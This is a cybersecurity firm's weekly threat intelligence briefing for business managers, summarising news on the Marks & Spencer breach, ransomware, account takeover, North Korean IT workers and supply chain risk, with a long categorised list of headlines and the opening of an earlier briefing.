-Ransomware Attacks are Getting Smarter, Harder to Stop
-People Know Password Reuse Is Risky but Keep Doing It Anyway
-A Cyber Security Paradox: Even Resilient Organisations Are Blind to AI Threats
-Securing the Invisible: Supply Chain Security Trends
-Don’t Overlook the BISO Role When it Comes to Growth and Continuity
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber-related news from the last week.
Exec Summary
Our review this week starts with the high-profile breach at UK retailer Marks & Spencer, which has severely impacted operations and employees for over a week, with reports that the organisation had not tested its cyber incident plan. Similar issues are evident across other sectors, with over 60% of firms globally reporting poor readiness for cyber, geopolitical, and AI-related threats.
Cyber resilience is a recurring theme in this week’s threat intelligence review. At Black Arrow Cyber, we recommend organisations test their response plan, such as through our simulation exercises where impartial experts help the leadership team to uncover and address misconceptions regarding IT provision or operational resilience. Such exercises are required by many cyber frameworks and regulations, including the UK’s Cyber Governance Code of Practice.
We also report on attack types including ransomware, account takeover, and AI-fuelled scams that produce fake receipts indistinguishable from the real thing. These developments strain traditional defences and expose critical gaps in resilience. The growing concern around insider risk, particularly the infiltration of major firms by North Korean operatives, reminds business leaders that threats are not always external.
Encouragingly, board-level awareness is growing, with more organisations recognising that cyber resilience must be embedded into company culture and governance. Black Arrow believes the growing prominence of roles like the Business Information Security Officer (BISO), which many of our services emulate, signals a necessary shift toward strategic, business-aligned security leadership and greater resilience against cyber incidents.
Top Cyber Stories of the Last Week
M&S ‘Had No Plan’ for Cyber Attacks, with Staff Sleeping in the Office Amid ‘Paranoia’ and ‘Chaos’
UK retailer Marks & Spencer continues to grapple with a severe cyber attack that has disrupted online orders and recruitment for over a week, with insiders warning full recovery may take months. Reports indicate the retailer lacked a cyber attack or business continuity plan, leaving staff to respond reactively; some described sleeping in offices and using personal devices amid confusion and shifting internal guidance. The situation has led to significant operational disruption and employee concern over whether hackers remain inside the system. Harrods and the Co-op Group have also been targeted in recent days, highlighting a broader wave of attacks. The Cabinet Office has warned that such incidents should serve as a wake-up call for all UK businesses to prioritise cyber security.
More than 60% of Organisations Are Insufficiently Prepared to Address Urgent Geopolitical, Cyber Security, and Regulatory Risks
AlixPartners’ 2025 Global Risk Survey reveals that over 60% of organisations feel underprepared to manage rising geopolitical, cyber security, and regulatory risks. Nearly three quarters are not ready for international regulatory changes, while 68% are unprepared for AI-related threats despite widespread adoption. Although 63% are investing in technology to combat financial crime, only 44% find it highly effective. Most also lack readiness for cyber security incidents and data privacy breaches. With nearly 70% anticipating increased corporate litigation, many are boosting legal budgets, highlighting a growing need for strategic risk management amid ongoing global volatility.
Fake Payments, Receipts and Invoices on the Rise
The rise of generative AI and poorly implemented automation is fuelling a surge in fake payments, receipts and invoices, putting businesses, particularly SMEs, at greater risk of financial loss. A third of firms were hit by invoice fraud in 2024, often due to weak controls around payment matching. New scams range from fake banking apps to AI-generated receipts indistinguishable from genuine ones. While government initiatives like the Cyber Governance Code of Practice and the forthcoming Cyber Security and Resilience Bill offer promise, there remains a gap between awareness and action, especially among smaller organisations.
Account Takeovers: A Growing Threat to Your Business and Customers
Account takeovers are rapidly emerging as one of the most costly and damaging cyber threats facing businesses today, with annual losses exceeding $5 billion in the US alone. These attacks occur when criminals gain unauthorised access to legitimate user accounts, often through tactics like credential stuffing, phishing, and SIM swapping. Once inside, attackers can steal funds and personal data, or lock out genuine users. Despite their growing sophistication, many organisations remain underprepared. The financial and reputational fallout can be severe, but proactive steps such as multi-factor authentication, behavioural analytics, and continuous monitoring can significantly reduce the risk.
North Korean Operatives Have Infiltrated Hundreds of Fortune 500 Companies
Security experts from Mandiant and Google Cloud have warned that hundreds of Fortune 500 firms have unknowingly hired North Korean IT workers, with most CISOs admitting to at least one such hire. These operatives, embedded as full-time staff, are earning six-figure salaries, generating an estimated $100 million annually for North Korea’s regime. While initially a financial operation, this threat has evolved, with some dismissed workers resorting to extortion. There is growing concern that these individuals could disrupt services or leak sensitive data, particularly as some have been linked to North Korea’s intelligence services and previous destructive cyber operations.
Phone Theft Is Turning into a Serious Cyber Security Risk
Phone theft is evolving into a significant cyber security risk, with the UK’s Metropolitan Police seizing 1,000 devices a week and Europol uncovering a network affecting over 480,000 victims worldwide. Many organisations still underestimate the risk posed by mobile devices, with only 63% able to track both BYOD and corporate phones. Poor controls and misplaced trust in default security features leave gaps that attackers can exploit to access corporate systems. Without clear response plans or robust mobile device management, stolen smartphones, often more data-rich than laptops, can become a gateway to wider breaches, especially when used for multi-factor authentication.
Why Cyber Resilience Must be Part of Every Organisation’s DNA
LevelBlue’s 2025 Futures Report highlights that while AI adoption is accelerating, only 29% of executives feel prepared for AI-powered threats, despite 42% expecting them. Deepfake attacks are anticipated by 44%, yet just 32% say they’re ready. Nearly half admit they must improve defences against AI-driven adversaries, and 41% are already seeing a significant rise in attacks. Encouragingly, 45% now view cyber resilience as a company-wide priority, up from 27% last year, with 68% noting increased C-suite focus due to media coverage of major breaches. The report urges leaders to embed resilience at board level, invest early, and foster a cyber-aware culture.
Compliance Management In 2025: Ensuring Your Security Strategy Meets Regulatory Demands
Compliance management in 2025 has become more complex and critical, with organisations facing heightened regulatory scrutiny and rising cyber threats. New laws across data privacy, ESG, and third-party risk demand proactive, data-driven compliance. Real-time monitoring and integration of AI and automation are increasingly used to detect risks and improve reporting accuracy. The cost of non-compliance is growing, making alignment between cyber security and regulatory strategy essential. Frameworks and certifications like NIST and ISO 27001, along with RegTech solutions, are now key to building resilient, scalable systems. Organisations must prioritise cross-functional collaboration and continuous improvement to remain secure and compliant.
Ransomware Attacks are Getting Smarter, Harder to Stop
Ransomware remains a critical threat, with 69% of organisations hit in the past year despite growing collaboration between IT and security teams. Yet only 10% of victims recovered over 90% of their data, while more than half recovered less than 50%. The shift toward data exfiltration and double extortion is accelerating, with attackers striking within hours. While ransom payments are declining and 36% of victims refused to pay, recovery gaps persist. Firms investing in data resilience recover up to seven times faster, but only 44% verify backups regularly. These findings underscore the need for proactive, well-practised cyber resilience strategies across the business.
People Know Password Reuse Is Risky but Keep Doing It Anyway
Bitwarden’s research reveals a concerning disconnect between awareness and behaviour when it comes to password security. While 79% of Gen Z acknowledge the risks of password reuse, 59% still recycle passwords after a breach. Over half of respondents have abandoned accounts to avoid password resets, and only 10% always update compromised credentials. Despite this, younger generations are more inclined to enable multi-factor authentication (MFA). Insecure sharing practices persist, with 25% of Gen Z using text messages to share passwords. The report highlights a clear need for targeted education across all age groups, especially among decision-makers.
A Cyber Security Paradox: Even Resilient Organisations Are Blind to AI Threats
LevelBlue’s latest report reveals a growing gap in AI risk awareness among otherwise cyber-resilient organisations. While 94% of these firms invest in software supply chain security, compared to just 62% overall, they remain largely blind to the risks introduced by rapid AI adoption. Only 30% of executives acknowledged increased AI-related supply chain threats. Many resilient organisations may be overlooking how underregulated AI tools expand their attack surface. The report stresses that cyber resilience now demands shared leadership responsibility, proactive risk management, and readiness for both incident response and business continuity.
Securing the Invisible: Supply Chain Security Trends
Supply chain attacks are evolving, with adversaries exploiting trusted software, hardware, and vendor relationships to bypass traditional defences. Continuous monitoring of third-party risk is replacing one-off assessments, as CISOs extend visibility across the extended enterprise. Real-time data, blockchain traceability, and AI-driven threat detection are now essential tools. Software Bills of Materials (SBOMs) have become operational necessities, helping firms assess exposure during emerging threats. Regulatory pressure is growing, with the EU’s DORA and NIS2 setting new expectations. Yet, only a third of supply chain leaders use GenAI tools designed for their domain despite 97% already using the technology in some form.
Don’t Overlook the BISO Role When it Comes to Growth and Continuity
The role of the Business Information Security Officer (BISO) is gaining traction as organisations recognise cyber risk as a critical business risk. BISOs act as a bridge between security teams and the C-suite, helping drive investment in proactive, cost-effective cyber strategies. With ransomware and extortion attacks on the rise, and the average cost of an incident now around $677 million, BISOs help quantify risk, improve resilience, and align security with broader business goals. Though adoption is still growing, more firms are realising the BISO’s value in fostering innovation, operational continuity, and modern cyber hygiene across the enterprise. Many of the services provided by Black Arrow fulfil the function of an internal BISO; talk to us to see how we can help you achieve your objectives in a cost-effective and impartial manner.
Sources:
https://cyberscoop.com/north-korea-workers-infiltrate-fortune-500/
https://www.helpnetsecurity.com/2025/05/02/phone-theft-cybersecurity-threat/
https://www.helpnetsecurity.com/2025/04/30/rethink-cyber-resilience/
https://cybersecuritynews.com/compliance-management-in-2025/
https://www.helpnetsecurity.com/2025/04/28/companies-impacted-ransomware-attacks/
https://www.helpnetsecurity.com/2025/05/02/passwords-update-security-risks/
https://www.darkreading.com/cyber-risk/even-resilient-organizations-bind-ai-threats
https://www.helpnetsecurity.com/2025/04/30/supply-chain-security-trends/
https://www.techradar.com/pro/dont-overlook-the-biso-role-when-it-comes-to-growth-and-continuity
Governance, Risk and Compliance
You're Probably Not Taking Cyber Security Seriously Enough - Above the Law
Don’t overlook the BISO role when it comes to growth and continuity | TechRadar
No longer optional: Cyber risk oversight for boards | American Banker
Stronger Together: Why IT And Security Collaboration Is Business Critical
Compliance Management In 2025: Ensuring Your Security Strategy Meets Regulatory Demands
Gartner: enabling cyber security amid geopolitical rifts | TechRadar
CISOs Call for Streamlined Global Cyber Rules | MSSP Alert
What is a Risk Map (Risk Heat Map)? | Definition from TechTarget
How CISOs Can Leverage Threat Intelligence to Stay Proactive
The CISO’s Role In Ensuring Compliance Amid Evolving Cyber Threats
Half of CIOs lack access to appropriate cyber security tools for their business - Business Plus
The Expanding Role of CISOs in Tech and Corporate Governance
Why CISOs Are Key to Integrating ESG and Cyber Security - Cyber Security News
From compliance to culture: Making security part of our daily routines
How to survive as a CISO aka 'chief scapegoat officer' • The Register
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware attacks are getting smarter, harder to stop - Help Net Security
Ransomware Group Hacks Webcam to Evade Endpoint Defences
The 5 Emerging Cyber Attack Techniques Poised to Disrupt
6 major supply chain cyber security risks in 2025 | Cybernews
DragonForce expands ransomware model with white-label branding scheme
Law Enforcement Crackdowns Drive Novel Ransomware Affiliate Schemes - Infosecurity Magazine
Prolific RansomHub Operation Goes Dark
Emerging Threat Actor Hellcat Exemplifies Continued Innovation in Ransomware TPPs | MSSP Alert
The 5,365 Ransomware Attack Rampage — What You Need To Know
Ransomware Attacks on Critical Infrastructure Surge, Reports FBI | Tripwire
Ransomware Victims
Marks & Spencer breach linked to Scattered Spider ransomware attack
M&S market value falls £700m amid cyber attack
Some M&S stores left with empty shelves after cyber attack - BBC News
M&S report warned of cyber threats year before hack
How ‘native English’ Scattered Spider group linked to M&S attack operate | Cybercrime | The Guardian
Co-op hit by cyber attack as back-office systems disrupted
M&S stops hiring after systems taken offline due to cyber attack
Top security body urges retailers to act following Marks & Spencer cyber attack | Retail Week
M&S: WFH staff locked out of systems amid cyber attack fallout - Retail Gazette
Harrods is latest retailer to be hit by cyber-attack | Harrods | The Guardian
Co-op cyber attack: Staff told to keep cameras on in meetings - BBC News
M&S cyber attack: Retailer working 'day and night' to manage impact - BBC News
M&S and Co-op: UK retailers brace for cyber attacks
Retail cyber attacks sound alarm for food manufacturing supply chains
Warning hackers may ‘try their luck’ with other retailers as M&S issues update | The Independent
Almost a million patients hit by Frederick Health data breach | TechRadar
Phishing & Email Based Attacks
Low-tech phishing attacks are gaining ground - Help Net Security
Same Inbox, New Tricks: A Look At The Email Threat Landscape In Q1 2025
This Email Sounds Like It Came From Your Boss. But It Didn’t. | Symantec Enterprise Blogs
Phishers Take Advantage of Iberian Power Outage
Why MFA is getting easier to bypass and what to do about it - Ars Technica
Criminals are pretending to be Microsoft, Google, and Apple in phishing attacks | TechRadar
A large-scale phishing campaign targets WordPress WooCommerce users
Large-Scale Phishing Campaigns Target Russia and Ukraine - Infosecurity Magazine
Other Social Engineering
North Koreans Still Working Hard to Take Your IT Job: 'Any Organisation Is a Target' | PCMag
There's one question that stumps North Korean fake workers • The Register
Mobile security is a frontline risk. Are you ready? - Help Net Security
North Korean operatives have infiltrated hundreds of Fortune 500 companies | CyberScoop
Fraud, Scams and Financial Crime
Cyber security: fake payments, receipts and invoices on the rise | ICAEW
Government Set to Ban SIM Farms in European First - Infosecurity Magazine
WhatsApp, Signal scam leads to Microsoft account hacks [April 2025] | Mashable
PayPal Red Alert Issued After 600% Increase In Scams Recorded in 2025: What You Need To Know
Online fraud peaks as breaches rise - Help Net Security
Mystery Box Scams Deployed to Steal Credit Card Data - Infosecurity Magazine
Gig-Work Platforms at Risk for Data Breaches, Fraud, Account Takeovers
Third-party applications for online banking give fraudsters access to your money - Cyberpolice | УНН
Artificial Intelligence
The 5 Emerging Cyber Attack Techniques Poised to Disrupt
Enterprises Need to Beware of These 5 Threats
AI and automation shift the cyber security balance toward attackers - Help Net Security
Even Cyber Resilient Organisations Struggle to Comprehend AI Risks
AI, Automation & Dark Web Fuel Evolving Threat Landscape
The Next Two Years In AI Cyber Security For Business Leaders
4 lessons in the new era of AI-enabled cyber crime | TechTarget
Agentic AI Systems Pose Alarming API Security Risks
Ex-NSA cyber boss: AI will soon be a great exploit dev • The Register
Claude AI Exploited to Operate 100+ Fake Political Personas in Global Influence Campaign
Forthcoming NIST profile to address growing AI-cyber challenges - Nextgov/FCW
South Korea says DeepSeek transferred user data, prompts without consent | Reuters
Microsoft’s AI Starts Secretly Copying And Saving Your Messages
60% of AI agents are embedded in IT departments - here's what they're doing | ZDNET
End users can code with AI, but IT must be wary | TechTarget
Drones may strike targets with no human input, says minister
2FA/MFA
Why MFA is getting easier to bypass and what to do about it - Ars Technica
Malware
CEO of cyber security firm charged with installing malware on hospital systems
Infosec pro blabs about alleged malware mishap on LinkedIn • The Register
New WordPress Malware Masquerades as Plugin - Infosecurity Magazine
Novel Gremlin Stealer malware emerges | SC Media
WordPress plugin disguised as a security tool injects backdoor
Malware Steals 1.7 Billion Passwords — Publishes Them To Dark Web
Hackers abuse IPv6 networking feature to hijack software updates
DarkWatchman cyber crime malware returns on Russian networks | The Record from Recorded Future News
Hive0117 group targets Russian firms with new variant of DarkWatchman malware
Mobile
Mobile security is a frontline risk. Are you ready? - Help Net Security
Phone theft is turning into a serious cyber security risk - Help Net Security
Mobile Applications: A Cesspool of Security Issues
Government Set to Ban SIM Farms in European First - Infosecurity Magazine
Half of Mobile Devices Run Outdated Operating Systems - Infosecurity Magazine
iOS and Android juice jacking defences have been trivial to bypass for years - Ars Technica
Google’s Play Store lost nearly half its apps | The Verge
Denial of Service/DoS/DDoS
DDoS attacks jump 358% compared to last year - Help Net Security
DDoS attacks in 2025 have already surpassed the 2024 total | TechRadar
Pro-Russian hackers strike Dutch municipalities with coordinated DDoS attack | NL Times
Internet of Things – IoT
Vehicles Face 45% More Attacks, 4 Times More Hackers
Data Breaches/Leaks
SAS names and ranks reportedly available online for a decade - BBC News
Malware Steals 1.7 Billion Passwords — Publishes Them To Dark Web
Signalgate: Security culture? America's screwed • The Register
27 million French electronics giant’s customer records leaked online | Cybernews
Commvault says recent breach didn't impact customer backup data
Ascension discloses second major cyber attack in a year • The Register
Gig-Work Platforms at Risk for Data Breaches, Fraud, Account Takeovers
African multinational telco giant MTN disclosed a data breach
Banking details of thousands of Aussies stolen by cyber criminals
ANY.RUN warns free-tier users of data exposure | Cybernews
Almost a million patients hit by Frederick Health data breach | TechRadar
Employee monitoring app exposes 21M work screens | Cybernews
Nova Scotia Power cyber attack impacts customer billing accounts | Cybernews
Organised Crime & Criminal Actors
Cyber criminals switch up their top initial access vectors of choice | CSO Online
Europol Creates “Violence-as-a-Service” Taskforce - Infosecurity Magazine
Cyber defenders need to remember their adversaries are human, says Trellix research head | IT Pro
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Storm-1977 Hits Education Clouds with AzureChecker, Deploys 200+ Crypto Mining Containers
Solana DeFi protocol Loopscale hit with $5.8 million exploit two weeks after launch | The Block
Insider Risk and Insider Threats
People know password reuse is risky but keep doing it anyway - Help Net Security
Infosec pro blabs about alleged malware mishap on LinkedIn • The Register
Ex-Disney employee gets three years in prison for menu hacks • The Register
North Koreans Still Working Hard to Take Your IT Job: 'Any Organisation Is a Target' | PCMag
North Korean operatives have infiltrated hundreds of Fortune 500 companies | CyberScoop
Insurance
Reducing Cyber Insurance Costs - CISO Proactive Measures
How Organisations Can Leverage Cyber Insurance Effectively
Supply Chain and Third Parties
6 major supply chain cyber security risks in 2025 | Cybernews
Half of red flags in third-party deals never reach compliance teams - Help Net Security
Securing the invisible: Supply chain security trends - Help Net Security
Cloud/SaaS
Over 90% of Cyber Security Leaders Worldwide Encountered Cyber Attacks Targeting Cloud Environments
JPMorgan CISO Warns of SaaS Security Risks - Infosecurity Magazine
Storm-1977 Hits Education Clouds with AzureChecker, Deploys 200+ Crypto Mining Containers
Dropbox, OneDrive Abused In Massive Southeast Asia Cyber-Espionage Operation
Outages
Oracle engineers caused dayslong software outage at U.S. hospitals
Identity and Access Management
Identity and Access Management (IAM) - The CISO’s Core Focus in Modern Cyber Security
Encryption
Quantum computer threat spurring quiet overhaul of internet security | CyberScoop
Passwords, Credential Stuffing & Brute Force Attacks
People know password reuse is risky but keep doing it anyway - Help Net Security
Some of you still use these awful passwords today
Account Takeovers: A Growing Threat to Your Business and Customers - Security Boulevard
Law Enforcement Can Break 77% Of ‘Three Random Word’ Passwords
Malware Steals 1.7 Billion Passwords — Publishes Them To Dark Web
Microsoft Confirms Password Spraying Attack — What You Need To Know
46% of the most trusted US companies' employees reuse
CISOs should re-consider using Microsoft RDP due to password flaw, says expert | CSO Online
Regulations, Fines and Legislation
Government Set to Ban SIM Farms in European First - Infosecurity Magazine
Compliance Management In 2025: Ensuring Your Security Strategy Meets Regulatory Demands
CISOs Call for Streamlined Global Cyber Rules | MSSP Alert
The CISO’s Role In Ensuring Compliance Amid Evolving Cyber Threats
Tariffs could slow replacement of telecom networks, according to industry official | CyberScoop
UK and Canadian Regulators Demand Robust Data Protection Amid 23andMe - Infosecurity Magazine
Former CISA head slams Trump for 'dangerously degrading' US cyber defences | Cybernews
Signalgate: Security culture? America's screwed • The Register
House passes bill to study routers’ national security risks | CyberScoop
FBI steps in amid rash of politically charged swattings • The Register
8 in 10 Brits support biometrics, personal data collection for national security | Biometric Update
The risks of standing down: Why halting US cyber ops against Russia erodes deterrence | CSO Online
CVE board 'kept in the dark' on funding, members say • The Register
Models, Frameworks and Standards
Will UK Cyber Reforms Keep Step with NIS2? | DLA Piper - JDSupra
Forthcoming NIST profile to address growing AI-cyber challenges - Nextgov/FCW
MoD publishes Secure by Design problem book to bolster cyber resilience | UKAuthority
Backup and Recovery
Commvault says recent breach didn't impact customer backup data
Data Protection
UK and Canadian Regulators Demand Robust Data Protection Amid 23andMe - Infosecurity Magazine
Law Enforcement Action and Take Downs
Ex-Disney employee gets three years in prison for menu hacks • The Register
Europol Creates “Violence-as-a-Service” Taskforce - Infosecurity Magazine
Leaders of 764, global child sextortion group, arrested and charged | CyberScoop
Law Enforcement Can Break 77% Of ‘Three Random Word’ Passwords
Misinformation, Disinformation and Propaganda
Claude AI Exploited to Operate 100+ Fake Political Personas in Global Influence Campaign
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
China
China is America's No.1 cyber threat and the US must react • The Register
House passes bill to study routers’ national security risks | CyberScoop
Chinese Hacking Competitions Fuel the Country’s Broad Cyber Ambitions - Bloomberg
China's Secret Weapon? How EV Batteries Could Be Weaponized to Disrupt America - SecurityWeek
Chinese APT's Adversary-in-the-Middle Tool Dissected - SecurityWeek
How Space Force Plans To Protect The US From Chinese & Russian Spy Satellites
Tariffs could slow replacement of telecom networks, according to industry official | CyberScoop
South Korea says DeepSeek transferred user data, prompts without consent | Reuters
Russia
Russia-linked group Nebulous Mantis targets NATO-related defence organisations
France ties Russian APT28 hackers to 12 cyber attacks on French orgs
Putin's Attacks on Ukraine Rise 70%, With Little Effect
Trump cuts US cyber aid to Ukraine, opening doors to Russian attacks | Cryptopolitan
How Space Force Plans To Protect The US From Chinese & Russian Spy Satellites
The risks of standing down: Why halting US cyber ops against Russia erodes deterrence | CSO Online
Pro-Russian hackers strike Dutch municipalities with coordinated DDoS attack | NL Times
Poland’s state registry temporarily blocked by cyber incident | The Record from Recorded Future News
Large-Scale Phishing Campaigns Target Russia and Ukraine - Infosecurity Magazine
DarkWatchman cyber crime malware returns on Russian networks | The Record from Recorded Future News
Hive0117 group targets Russian firms with new variant of DarkWatchman malware
Iran
North Korea
North Koreans Still Working Hard to Take Your IT Job: 'Any Organisation Is a Target' | PCMag
There's one question that stumps North Korean fake workers • The Register
North Korean operatives have infiltrated hundreds of Fortune 500 companies | CyberScoop
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Dropbox, OneDrive Abused In Massive Southeast Asia Cyber-Espionage Operation
Tools and Controls
No longer optional: Cyber risk oversight for boards | American Banker
Why cyber resilience must be part of every organisation's DNA - Help Net Security
Over 90% of Cyber Security Leaders Worldwide Encountered Cyber Attacks Targeting Cloud Environments
Identity and Access Management (IAM) - The CISO’s Core Focus in Modern Cyber Security
How Organisations Can Leverage Cyber Insurance Effectively
How the hybrid work boom reshapes corporate security | TechRadar
SentinelOne says security vendors are under attack | Cybernews
The CISO’s Guide to Managing Cyber Risk in Hybrid Workplaces
CISOs should re-consider using Microsoft RDP due to password flaw, says expert | CSO Online
CISOs Take Note: Is Needless Cyber Security Strangling Your Business?
What is a Risk Map (Risk Heat Map)? | Definition from TechTarget
How CISOs Can Leverage Threat Intelligence to Stay Proactive
Why CISOs Are Key to Integrating ESG and Cyber Security - Cyber Security News
Commvault says recent breach didn't impact customer backup data
The Hidden Risks of Over-Relying on AI in Cyber Security | MSSP Alert
21 million employee screenshots leaked in bossware breach blunder
Cloud Security Essentials - CISO Resource Toolkit
Employee monitoring app exposes 21M work screens | Cybernews
USAID decides not to collect former workers’ abandoned devices | The Verge
End users can code with AI, but IT must be wary | TechTarget
CIOs Say Security Systems Not Delivering Value For Money, Too Complex To Manage - IT Security Guru
MoD publishes Secure by Design problem book to bolster cyber resilience | UKAuthority
Other News
Why SMEs can no longer afford to ignore cyber risk - Help Net Security
Enterprises Need to Beware of These 5 Threats
Cyber security vendors are themselves under attack by hackers, SentinelOne says | CyberScoop
You're Probably Not Taking Cyber Security Seriously Enough - Above the Law
Study: 90% of bankers see need to increase spending on cyber security
Cyber Security in the UK - House of Commons Library
The 3 biggest cyber security threats to small businesses | Malwarebytes
Cyber defenders need to remember their adversaries are human, says Trellix research head | IT Pro
European Council: No cyber attack in Spain-Portugal blackout - Shafaq News
Getting Physical with Cyber Security - Security Boulevard
7 network security myths that make you less secure
How working from home made Britain vulnerable to cyber attackers
It’s Time to Prioritize Cyber Security Education - Security Boulevard
Cyber Threats Loom Large Over US Space Systems, Warns Pentagon Official - ClearanceJobs
Just 60 Seconds From Attacked To Hacked — The Speed Of Cyber Crime
How to Strengthen Cyber Security in Public Safety and Prevent Downtime
The threats to Britain’s food security can no longer be downplayed
A Windows security developer says this is the biggest threat to your PC | PCWorld
Vulnerability Management
Most critical vulnerabilities aren't worth your attention - Help Net Security
Hackers exploited 75 zero-days last year – Google | Cybernews
44% of the zero-days exploited in 2024 were in enterprise solutions - Help Net Security
Google: Governments are using zero-day hacks more than ever - Ars Technica
How Breaches Start: Breaking Down 5 Real Vulns
CVE board 'kept in the dark' on funding, members say • The Register
Solana DeFi protocol Loopscale hit with $5.8 million exploit two weeks after launch | The Block
CIOs Say Security Systems Not Delivering Value For Money, Too Complex To Manage - IT Security Guru
Vulnerabilities
Google Issues Emergency Chrome Security Update — Act Now
Experts forecast Ivanti VPN attacks as endpoint scans surge • The Register
SAP fixes suspected Netweaver zero-day exploited in attacks
Chrome 136, Firefox 138 Patch High-Severity Vulnerabilities - SecurityWeek
SonicWall Confirms Active Exploitation of Flaws Affecting Multiple Appliance Models
Airplay-enabled devices open to attack via "AirBorne" vulnerabilities - Help Net Security
CISOs should re-consider using Microsoft RDP due to password flaw, says expert | CSO Online
Hackers Exploit Critical Craft CMS Flaws; Hundreds of Servers Likely Compromised
Craft CMS RCE exploit chain used in zero-day attacks to steal data
Coinbase fixes 2FA log error making people think they were hacked
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness; linking to or reposting external content does not endorse any service or product, and likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 25 April 2025
Black Arrow Cyber Threat Intelligence Briefing 25 April 2025:
-Cyber Security Is Now Critical for Business Growth, CEOs Say
-Cyber Threats Now a Daily Reality for One in Three Businesses
-66% of CISOs Are Worried Cyber Security Threats Surpass Their Defences
-M&S: Shares at FTSE 100 Retailer Fall as Cyber Attack Hits Customers
-Verizon DBIR: Small Businesses Bearing the Brunt of Ransomware Attacks
-Cyber Attacks Surged in 2025, with Third Party Attacks Seeing a Huge Rise
-Nation-State Threats Put SMBs in Their Sights
-Global Firms Succumb to Ransomware: 86% Pay Up Despite Having Advanced Backup Tools
-Dutch Intelligence Report: Russia’s Sabotage in Europe Borders on State Terrorism
-Cyber Crime Syndicates Expand Beyond Southeast Asia, UN Warns of Global Threat
-159 Vulnerabilities Exploited in Q1 2025 — 28% Within 24 Hours of Disclosure
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber-related news from the last week.
Exec Summary
Black Arrow Cyber’s review of specialist and general media has observed a significant shift in executive mindsets, with cyber security now seen as essential to business growth, not just a defensive measure. This includes reports of CEOs increasingly recognising the strategic value of robust security practices, particularly amid rising concerns over AI-driven threats. However, there remains a concerning gap between CISOs and the wider C-suite regarding the severity of risks, underlining the need for stronger alignment at leadership level.
This week’s reporting also highlights that cyber threats have become a daily operational reality, with small and medium-sized businesses bearing a disproportionate share of ransomware and nation-state attacks. Third-party vulnerabilities and supply chain compromises are escalating rapidly, exposing organisations to breaches through trusted partners. Black Arrow Cyber believes this growing complexity demands that businesses urgently reassess their resilience strategies and third-party risk management.
Finally, we note that ransomware attacks continue to overwhelm organisations, with high ransom payment rates despite advanced backup tools. Rapid exploitation of newly disclosed vulnerabilities, particularly in widely used systems, further compounds the threat landscape. Black Arrow believes that operational readiness, strong identity management, and swift vulnerability patching are now critical pillars for cyber resilience.
Top Cyber Stories of the Last Week
Cyber Security Is Now Critical for Business Growth, CEOs Say
A Gartner study has found that 85% of CEOs now view cyber security as critical to business growth in today’s digital and connected world. Three in five (61%) are concerned about cyber security threats, particularly with the rise of artificial intelligence influencing the threat landscape. The report highlights a shift in risk thresholds and underlines that cyber security has become a core business priority rather than simply a protective measure. CEOs are urged to champion the role of security leaders, while security leaders must demonstrate how effective cyber security strategies can safeguard assets and drive strategic growth.
Cyber Threats Now a Daily Reality for One in Three Businesses
FIS and Oxford Economics report that one in three businesses face daily cyber threats, 74% encounter critical incidents monthly, and 88% of leaders cite cyber threats as a major disruption. Despite prioritising fraud risk management, over half of firms were dissatisfied with their fraud response plans, and nearly half do not regularly train employees on fraud and cyber awareness, leaving them exposed to greater risk.
66% of CISOs Are Worried Cyber Security Threats Surpass Their Defences
EY has found a growing disconnect between CISOs and the wider C-suite when it comes to cyber security threats. Two-thirds of CISOs fear threats now surpass their defences, compared to just over half of their C-suite peers. The report highlights that CISOs are more concerned than the rest of the C-suite about senior leaders at their organisation underestimating the dangers of cyber security threats (68% vs. 57%), and they note a higher incidence of attacks from both cyber criminals and insider threats. Encouragingly, 75% of CISOs reported fewer incidents following investment in AI. C-suite leaders expect cyber security budgets to double next year, from 21% to 38% of total IT spend.
M&S: Shares at FTSE 100 Retailer Fall as Cyber Attack Hits Customers
Marks & Spencer (M&S) has confirmed it is managing a cyber attack that has disrupted contactless payments and forced the retailer to stop taking online orders amid a payments meltdown. As a result, shares have fallen by more than 4%. While stores remain open, M&S has temporarily moved some operations offline to protect customers and partners. Online orders have been suspended, but cash payments are still being accepted. The retailer is working with industry experts to restore full services and minimise further disruption.
Verizon DBIR: Small Businesses Bearing the Brunt of Ransomware Attacks
Verizon’s latest Data Breach Investigations Report (DBIR) highlights that small businesses are bearing the brunt of ransomware attacks, with extortion malware found in 88% of breaches compared to 39% at larger firms. Ransomware was involved in 44% of all breaches, a 37% rise from the previous year, with attack volumes increasing globally. State-sponsored actors are also increasingly deploying ransomware, with financial motives present in 28% of their incidents. Industries such as administration, wholesale trade, and transportation remain key targets for financially motivated cyber attacks.
Cyber Attacks Surged in 2025, with Third Party Attacks Seeing a Huge Rise
Verizon’s latest Data Breach Investigations Report also found that third-party involvement in cyber attacks has doubled, now featuring in 30% of cases. Based on over 22,000 security incidents and 12,195 confirmed data breaches, the research highlights a sharp rise in supply chain and partner ecosystem compromises. Cyber criminals increasingly target open-source code repositories to push malicious updates or impersonate legitimate software packages. The findings underline the growing risk third parties pose to organisations’ cyber security, with trust in external partners becoming a significant vulnerability.
